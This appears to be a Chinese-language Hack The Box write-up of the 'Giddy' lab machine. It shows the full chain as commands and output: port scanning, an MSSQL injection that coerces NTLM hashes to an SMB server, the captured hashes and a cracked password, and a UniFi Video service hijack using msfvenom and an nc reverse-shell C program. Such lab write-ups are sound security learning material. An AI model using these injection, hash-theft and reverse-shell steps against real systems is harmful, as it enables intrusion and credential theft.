端口扫描

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:49 CST
Nmap scan report for 10.10.10.104
Host is up (0.081s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
3389/tcp open  ms-wbt-server
5985/tcp open  wsman
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,443,3389,5985 10.10.10.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 21:50 CST
Nmap scan report for 10.10.10.104
Host is up (0.22s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2024-09-07T13:41:24+00:00; -10m10s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|   h2
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2024-09-07T13:41:14+00:00
|_ssl-date: 2024-09-07T13:41:24+00:00; -10m10s from scanner time.
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2024-09-06T13:36:08
|_Not valid after:  2025-03-08T13:36:08
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m10s, deviation: 0s, median: -10m10s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.65 seconds

MSSQL注入

80和443开的是一样的,开具一张图,图的名字叫做giddy,也是房间的名字,很有可能是用户名

然后没别的内容了,扫一下目录,有一个/remote目录和/mvc,是一个登陆界面,似乎是powershell的web服务,进去应该能命令执行,但没有凭证。于是转向/mvc,有一个注册和登录,搜索界面,注册一个账号后也没什么新的服务出现。结果在搜索框中输入一个’得到了报错

而且得到了search.apsx的绝对路径:

C:\Users\jnogueira\Downloads\owasp10\1-owasp-top10-m1-injection-exercise-files\before\1-Injection\Search.aspx.cs:30

似乎是owasp10的注入练习题???

虽然sqlmap能一直再跑不出来,但是在product.apsx也存在注入,并且结果出的很快,但是数据都没什么,使用–os-shel失败,因为没有xp_cmdshell。

这里用到mssql注入来使其主机请求我们本地的smb服务器,并且会向我们发送ntlm哈希原理可见这篇大佬的文章:

https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html

那么本地开启一个smb服务器

curl 'http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18;%20EXEC%20master..xp_dirtree%20%22\\vpnip\share%22;%20--'
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ impacket-smbserver share .  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49712)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:d13b7d45acd2dcd29343b8eb57ced2d1:010100000000000000dac42a3501db017b36bd2e141f025400000000010010007700510055004a005200620059006300030010007700510055004a0052006200590063000200100052004a00420054004d005100620048000400100052004a00420054004d005100620048000700080000dac42a3501db0106000400020000000800300030000000000000000000000000300000a1db4d82d342e1160e60515b6c8f126040156f78f70c034c988bf33daf6659a20a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003600000000000000000000000000
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:aaaaaaaaaaaaaaaa:497e71dcbd0bb43c6b5fc1b6cd80e378:010100000000000080705d2b3501db013187fbe13414267c00000000010010007700510055004a005200620059006300030010007700510055004a0052006200590063000200100052004a00420054004d005100620048000400100052004a00420054004d005100620048000700080080705d2b3501db0106000400020000000800300030000000000000000000000000300000a1db4d82d342e1160e60515b6c8f126040156f78f70c034c988bf33daf6659a20a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003600000000000000000000000000

爆破哈希,得到用户名和密码

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x     (Stacy)     
1g 0:00:00:01 DONE (2024-09-07 22:51) 0.8695g/s 2338Kp/s 2338Kc/s 2338KC/s xamton..x9820x
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

本想试着3389端口远程桌面,但似乎没开?那就用evil-winrm

提权

没什么特殊权限,但是在用户的documents有一个unifivideo文件,非常奇怪,搜了一下是一个视频监控软件

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ searchsploit unifi video
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security | php/webapps/39268.java
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation            | windows/local/43390.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

存在一个本地提权漏洞,漏洞介绍:

Ubiquiti UniFi Video for Windows 默认安装到“C:\ProgramData\unifi-video\”,并且还附带一项名为“Ubiquiti UniFi Video”的服务。其可执行文件“avService.exe”位于同一目录中,也在 NT AUTHORITY/SYSTEM 帐户下运行。

但是,“C:\ProgramData\unifi-video”文件夹的默认权限是从“C:\ProgramData”继承的,并且没有被明确覆盖,这允许所有用户(甚至是非特权用户)将文件附加和写入应用程序目录:

在启动和停止服务时,它会尝试加载并执行位于“C:\ProgramData\unifi-video\taskkill.exe”的文件。但是,默认情况下,此文件根本不存在于应用程序目录中。

通过以非特权用户身份将任意“taskkill.exe”复制到“C:\ProgramData\unifi-video\”,可以提升权限并以 NT AUTHORITY/SYSTEM 身份执行任意代码。

查看注册表得到服务名称

*Evil-WinRM* PS HKLM:\system\currentcontrolset\services> dir HKLM:\system\currentcontrolset\services
|findstr "unifi-video"
                               ImagePath       : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService\

生成一个反弹shell

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.16 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe >taskkill.exe

通过smb服务器转移到主机上

*Evil-WinRM* PS C:\ProgramData\unifi-video> copy \\10.10.14.16\share\taskkill.exe .

然而当我关闭服务的时候并没有接收到shell,如果手动执行则会被applocker阻挡,但是就算转移至C:\Windows\tasks目录执行也无法收到shell,也许是被Defender杀掉了

但是这里学到了一招,创建一个c,创建一个可执行文件,当执行的时候会使用nc反弹shell,因为一般nc是不会被杀的

┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ cat taskkill.c                                      
#include "stdlib.h"

int main()
{
    system("nc64.exe -e cmd.exe vpnip 443");
    return 0;
}
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ x86_64-w64-mingw32-gcc taskkill.c -o taskkill.exe
*Evil-WinRM* PS C:\programdata\unifi-video> copy \\10.10.14.16\share\taskkill.exe .
*Evil-WinRM* PS C:\programdata\unifi-video> Stop-Service -Name Unifivideoservice -Force
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (Unifivideoservice)' to stop...
┌──(mikannse㉿kali)-[~/HTB/giddy]
└─$ rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.104] 49882
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video>whoami /all
whoami /all

USER INFORMATION
----------------

User Name           SID     
=================== ========
nt authority\system S-1-5-18

碎碎念

收获巨大的一个房间,第一次遇到mssql注入,还是有些不同的,以及利用他进行ntlm窃取。提权也学到了服务利用的新方式,其实和wreath那个房间教的差不多,但感觉更方便233就是创建一个新的执行文件,来使用nc来反弹shell